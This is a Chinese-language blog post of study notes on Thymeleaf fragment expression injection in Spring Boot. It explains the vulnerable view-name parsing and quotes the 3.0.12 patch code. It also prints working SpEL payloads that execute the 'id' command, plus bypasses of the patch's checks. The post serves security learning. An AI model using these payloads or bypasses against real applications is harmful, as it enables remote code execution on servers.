<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":30,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":true},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="thymeleaf fragment注入学习与springBoot整合步骤1.导入依赖,版本可以不写,由springBoot统一管理">
<meta property="og:type" content="article">
<meta property="og:title" content="thymeleaf简单入门">
<meta property="og:url" content="http://example.com/2022/12/16/thymeleaf%E7%AE%80%E5%8D%95%E5%85%A5%E9%97%A8/index.html">
<meta property="og:site_name" content="blueSatchel&#39;s blog">
<meta property="og:description" content="thymeleaf fragment注入学习与springBoot整合步骤1.导入依赖,版本可以不写,由springBoot统一管理">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221104235220749.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221104235352336.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221104235458060.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221104235637768.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105005907494.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105180720931.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105182319525.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105182858029.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105183035030.png">
<meta property="og:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105185826610.png">
<meta property="article:published_time" content="2022-12-16T00:25:21.000Z">
<meta property="article:modified_time" content="2022-12-16T00:26:59.741Z">
<meta property="article:author" content="blueSatchel">
<meta property="article:tag" content="-- java -- thymeleaf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221104235220749.png">

<link rel="canonical" href="http://example.com/2022/12/16/thymeleaf%E7%AE%80%E5%8D%95%E5%85%A5%E9%97%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>thymeleaf简单入门 | blueSatchel's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">blueSatchel's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/12/16/thymeleaf%E7%AE%80%E5%8D%95%E5%85%A5%E9%97%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/../images/luoqixi.png">
      <meta itemprop="name" content="blueSatchel">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="blueSatchel's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          thymeleaf简单入门
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-12-16 08:25:21 / 修改时间：08:26:59" itemprop="dateCreated datePublished" datetime="2022-12-16T08:25:21+08:00">2022-12-16</time>
            </span>

          
            <span id="/2022/12/16/thymeleaf%E7%AE%80%E5%8D%95%E5%85%A5%E9%97%A8/" class="post-meta-item leancloud_visitors" data-flag-title="thymeleaf简单入门" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/12/16/thymeleaf%E7%AE%80%E5%8D%95%E5%85%A5%E9%97%A8/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/12/16/thymeleaf%E7%AE%80%E5%8D%95%E5%85%A5%E9%97%A8/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="thymeleaf-fragment注入学习"><a href="#thymeleaf-fragment注入学习" class="headerlink" title="thymeleaf fragment注入学习"></a>thymeleaf fragment注入学习</h2><h3 id="与springBoot整合"><a href="#与springBoot整合" class="headerlink" title="与springBoot整合"></a>与springBoot整合</h3><h3 id="步骤"><a href="#步骤" class="headerlink" title="步骤"></a>步骤</h3><h5 id="1-导入依赖-版本可以不写-由springBoot统一管理"><a href="#1-导入依赖-版本可以不写-由springBoot统一管理" class="headerlink" title="1.导入依赖,版本可以不写,由springBoot统一管理"></a>1.导入依赖,版本可以不写,由springBoot统一管理</h5><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.springframework.boot<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>spring-boot-starter-thymeleaf<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="2-在resources文件夹下面创建templates文件夹-一般所有模板均放在此文件夹下面"><a href="#2-在resources文件夹下面创建templates文件夹-一般所有模板均放在此文件夹下面" class="headerlink" title="2.在resources文件夹下面创建templates文件夹,一般所有模板均放在此文件夹下面"></a>2.在resources文件夹下面创建templates文件夹,一般所有模板均放在此文件夹下面</h5><p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221104235220749.png" alt="image-20221104235220749"></p>
<h5 id="3-配置模板文件路径的前后缀"><a href="#3-配置模板文件路径的前后缀" class="headerlink" title="3.配置模板文件路径的前后缀"></a>3.配置模板文件路径的前后缀</h5><p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221104235352336.png" alt="image-20221104235352336"></p>
<h5 id="4-配置打包后的静态资源存放路径-一般不需要写"><a href="#4-配置打包后的静态资源存放路径-一般不需要写" class="headerlink" title="4.配置打包后的静态资源存放路径,一般不需要写"></a>4.配置打包后的静态资源存放路径,一般不需要写</h5><p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221104235458060.png" alt="image-20221104235458060"></p>
<h5 id="5-编写代码"><a href="#5-编写代码" class="headerlink" title="5.编写代码"></a>5.编写代码</h5><p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221104235637768.png" alt="image-20221104235637768"></p>
<p>访问/index即可</p>
<h4 id="注入原理"><a href="#注入原理" class="headerlink" title="注入原理"></a>注入原理</h4><p>该漏洞有版本限制,目前在springBoot2.2.0.RELEASE版本可以执行</p>
<p><a target="_blank" rel="noopener" href="https://github.com/veracode-research/spring-view-manipulation/">原理文章</a></p>
<p>before loading the template from the filesystem, <a target="_blank" rel="noopener" href="https://github.com/thymeleaf/thymeleaf-spring/blob/74c4203bd5a2935ef5e571791c7f286e628b6c31/thymeleaf-spring3/src/main/java/org/thymeleaf/spring3/view/ThymeleafView.java">Spring ThymeleafView</a> class parses the template name as an expression:</p>
<p>thymeleaf的fragment 功能会将::后面的字符串当成表达式解析</p>
<p>fragement功能实现效果类似于vue动态路由传递一个参数过去让其选择性显示某一个div</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105005907494.png" alt="image-20221105005907494"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">   <span class="comment">// By parsing it as a standard expression, we might profit from the expression cache</span></span><br><span class="line">   fragmentExpression = (FragmentExpression) parser.parseExpression(context, <span class="string">&quot;~&#123;&quot;</span> + viewTemplateName + <span class="string">&quot;&#125;&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h5 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__$&#123;<span class="keyword">new</span> java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(<span class="string">&quot;id&quot;</span>).getInputStream()).next()&#125;__::.x</span><br></pre></td></tr></table></figure>



<h4 id="原理简单跟进"><a href="#原理简单跟进" class="headerlink" title="原理简单跟进"></a>原理简单跟进</h4><p>spel表达式则需要再额外学习一下,这里先跟着研究一下Payload的简单构造原理</p>
<h4 id=""><a href="#" class="headerlink" title=""></a><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105180720931.png" alt="image-20221105180720931"></h4><p>上面这段表明只有当模板名称包含::的时候,才能进入到parseExpression</p>
<p>打断点跟进,发现在这个方法中会执行</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105182319525.png" alt="image-20221105182319525"></p>
<p>在这里通过正则匹配到__  __包裹的内容</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105182858029.png" alt="image-20221105182858029"></p>
<p>最后执行的时候会被还原成一个标准的spel表达式</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105183035030.png" alt="image-20221105183035030"></p>
<p><strong>以上逻辑仅限于Thymeleaf 3.0-3.0.12(不含3.0.12)</strong>     </p>
<h2 id="Thymeleaf-3-0-12"><a href="#Thymeleaf-3-0-12" class="headerlink" title="Thymeleaf 3.0.12"></a>Thymeleaf 3.0.12</h2><p>在3.0.12版本发布了一个补丁</p>
<p>其新增了一个这样的函数,当调用表达式的时候，会经过该函数的判断</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">containsSpELInstantiationOrStatic</span><span class="params">(<span class="keyword">final</span> String expression)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">final</span> <span class="keyword">int</span> explen = expression.length();</span><br><span class="line">        <span class="keyword">int</span> n = explen;</span><br><span class="line">        <span class="keyword">int</span> ni = <span class="number">0</span>; <span class="comment">// index for computing position in the NEW_ARRAY</span></span><br><span class="line">        <span class="keyword">int</span> si = -<span class="number">1</span>;</span><br><span class="line">        <span class="keyword">char</span> c;</span><br><span class="line">        <span class="keyword">while</span> (n-- != <span class="number">0</span>) &#123;</span><br><span class="line">            c = expression.charAt(n);</span><br><span class="line">            <span class="keyword">if</span> (ni &lt; NEW_LEN</span><br><span class="line">                    &amp;&amp; c == NEW_ARRAY[ni]</span><br><span class="line">                    &amp;&amp; (ni &gt; <span class="number">0</span> || ((n + <span class="number">1</span> &lt; explen) &amp;&amp; Character.isWhitespace(expression.charAt(n + <span class="number">1</span>))))) &#123;</span><br><span class="line">                ni++;</span><br><span class="line">                <span class="keyword">if</span> (ni == NEW_LEN &amp;&amp; (n == <span class="number">0</span> || !Character.isJavaIdentifierPart(expression.charAt(n - <span class="number">1</span>)))) &#123;</span><br><span class="line">                    <span class="keyword">return</span> <span class="keyword">true</span>; <span class="comment">// we found an object instantiation</span></span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (ni &gt; <span class="number">0</span>) &#123;</span><br><span class="line">                n += ni;</span><br><span class="line">                ni = <span class="number">0</span>;</span><br><span class="line">                <span class="keyword">if</span> (si &lt; n) &#123;</span><br><span class="line">                    <span class="comment">// This has to be restarted too</span></span><br><span class="line">                    si = -<span class="number">1</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            ni = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (c == <span class="string">&#x27;)&#x27;</span>) &#123;</span><br><span class="line">                si = n;</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> (si &gt; n &amp;&amp; c == <span class="string">&#x27;(&#x27;</span></span><br><span class="line">                        &amp;&amp; ((n - <span class="number">1</span> &gt;= <span class="number">0</span>) &amp;&amp; (expression.charAt(n - <span class="number">1</span>) == <span class="string">&#x27;T&#x27;</span>))</span><br><span class="line">                        &amp;&amp; ((n - <span class="number">1</span> == <span class="number">0</span>) || !Character.isJavaIdentifierPart(expression.charAt(n - <span class="number">2</span>)))) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> (si &gt; n &amp;&amp; !(Character.isJavaIdentifierPart(c) || c == <span class="string">&#x27;.&#x27;</span>)) &#123;</span><br><span class="line">                si = -<span class="number">1</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>可以看到其主要逻辑是首先 倒序检测是否包含 <code>wen</code>关键字、在<code>(</code>的左边的字符是否是<code>T</code>，如包含，那么认为找到了一个实例化对象，返回<code>true</code>，阻止该表达式的执行。</p>
<p>因此要绕过这个函数，只要满足三点：<br>1、表达式中不能含有关键字<code>new</code><br>2、在<code>(</code>的左边的字符不能是<code>T</code><br>3、不能在<code>T</code>和<code>(</code>中间添加的字符使得原表达式出现问题</p>
<p>三梦师傅给出的答案是%20(空格)，在copanda的研究中发现其实还有%0a(换行)、%09(制表符)，此外，通过 fuzzing 同样可以找到很多可以利用的字符</p>
<h5 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">home/__$&#123;new java.util.Scanner(T (java.lang.Runtime).getRuntime().exec(&quot;id&quot;).getInputStream()).next()&#125;__::.x</span><br></pre></td></tr></table></figure>

<h4 id="当视图名与当前path一致的时候"><a href="#当视图名与当前path一致的时候" class="headerlink" title="当视图名与当前path一致的时候"></a>当视图名与当前path一致的时候</h4><p>就是类似这样</p>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20221105185826610.png" alt="image-20221105185826610"></p>
<p>那么就会经过<code>SpringRequestUtils.java</code>中的<code>checkViewNameNotInRequest</code>函数检测</p>
<h5 id="绕过方法"><a href="#绕过方法" class="headerlink" title="绕过方法"></a>绕过方法</h5><h6 id="1-两个"><a href="#1-两个" class="headerlink" title="1.两个/"></a>1.两个/</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user//__$&#123;new java.util.Scanner(T (java.lang.Runtime).getRuntime().exec(&quot;id&quot;).getInputStream()).next()&#125;__::.x</span><br></pre></td></tr></table></figure>

<h6 id="2-分号"><a href="#2-分号" class="headerlink" title="2.分号"></a>2.分号</h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user/;__$&#123;new java.util.Scanner(T (java.lang.Runtime).getRuntime().exec(&quot;id&quot;).getInputStream()).next()&#125;__::.x</span><br></pre></td></tr></table></figure>


    </div>

    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/zanshangma.png" alt="blueSatchel 微信支付">
        <p>微信支付</p>
      </div>

  </div>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/java-thymeleaf/" rel="tag"># -- java -- thymeleaf</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/09/27/shiro%E7%AE%80%E5%8D%95%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/" rel="prev" title="shiro简单学习记录">
      <i class="fa fa-chevron-left"></i> shiro简单学习记录
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/09/28/%E6%A0%88%E5%92%8C%E9%98%9F%E5%88%97/" rel="next" title="栈和队列">
      栈和队列 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#thymeleaf-fragment%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0"><span class="nav-number">1.</span> <span class="nav-text">thymeleaf fragment注入学习</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%8EspringBoot%E6%95%B4%E5%90%88"><span class="nav-number">1.1.</span> <span class="nav-text">与springBoot整合</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%AD%A5%E9%AA%A4"><span class="nav-number">1.2.</span> <span class="nav-text">步骤</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1-%E5%AF%BC%E5%85%A5%E4%BE%9D%E8%B5%96-%E7%89%88%E6%9C%AC%E5%8F%AF%E4%BB%A5%E4%B8%8D%E5%86%99-%E7%94%B1springBoot%E7%BB%9F%E4%B8%80%E7%AE%A1%E7%90%86"><span class="nav-number">1.2.0.1.</span> <span class="nav-text">1.导入依赖,版本可以不写,由springBoot统一管理</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2-%E5%9C%A8resources%E6%96%87%E4%BB%B6%E5%A4%B9%E4%B8%8B%E9%9D%A2%E5%88%9B%E5%BB%BAtemplates%E6%96%87%E4%BB%B6%E5%A4%B9-%E4%B8%80%E8%88%AC%E6%89%80%E6%9C%89%E6%A8%A1%E6%9D%BF%E5%9D%87%E6%94%BE%E5%9C%A8%E6%AD%A4%E6%96%87%E4%BB%B6%E5%A4%B9%E4%B8%8B%E9%9D%A2"><span class="nav-number">1.2.0.2.</span> <span class="nav-text">2.在resources文件夹下面创建templates文件夹,一般所有模板均放在此文件夹下面</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#3-%E9%85%8D%E7%BD%AE%E6%A8%A1%E6%9D%BF%E6%96%87%E4%BB%B6%E8%B7%AF%E5%BE%84%E7%9A%84%E5%89%8D%E5%90%8E%E7%BC%80"><span class="nav-number">1.2.0.3.</span> <span class="nav-text">3.配置模板文件路径的前后缀</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#4-%E9%85%8D%E7%BD%AE%E6%89%93%E5%8C%85%E5%90%8E%E7%9A%84%E9%9D%99%E6%80%81%E8%B5%84%E6%BA%90%E5%AD%98%E6%94%BE%E8%B7%AF%E5%BE%84-%E4%B8%80%E8%88%AC%E4%B8%8D%E9%9C%80%E8%A6%81%E5%86%99"><span class="nav-number">1.2.0.4.</span> <span class="nav-text">4.配置打包后的静态资源存放路径,一般不需要写</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#5-%E7%BC%96%E5%86%99%E4%BB%A3%E7%A0%81"><span class="nav-number">1.2.0.5.</span> <span class="nav-text">5.编写代码</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="nav-number">1.2.1.</span> <span class="nav-text">注入原理</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86%E7%AE%80%E5%8D%95%E8%B7%9F%E8%BF%9B"><span class="nav-number">1.2.2.</span> <span class="nav-text">原理简单跟进</span></a></li><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-number">1.2.3.</span> <span class="nav-text"></span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Thymeleaf-3-0-12"><span class="nav-number">2.</span> <span class="nav-text">Thymeleaf 3.0.12</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-1"><span class="nav-number">2.0.0.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BD%93%E8%A7%86%E5%9B%BE%E5%90%8D%E4%B8%8E%E5%BD%93%E5%89%8Dpath%E4%B8%80%E8%87%B4%E7%9A%84%E6%97%B6%E5%80%99"><span class="nav-number">2.0.1.</span> <span class="nav-text">当视图名与当前path一致的时候</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="nav-number">2.0.1.1.</span> <span class="nav-text">绕过方法</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#1-%E4%B8%A4%E4%B8%AA"><span class="nav-number">2.0.1.1.1.</span> <span class="nav-text">1.两个&#x2F;</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#2-%E5%88%86%E5%8F%B7"><span class="nav-number">2.0.1.1.2.</span> <span class="nav-text">2.分号</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="blueSatchel"
      src="/../images/luoqixi.png">
  <p class="site-author-name" itemprop="name">blueSatchel</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">78</span>
          <span class="site-state-item-name">文章</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">21</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">71</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/bluesatchel" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;bluesatchel" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
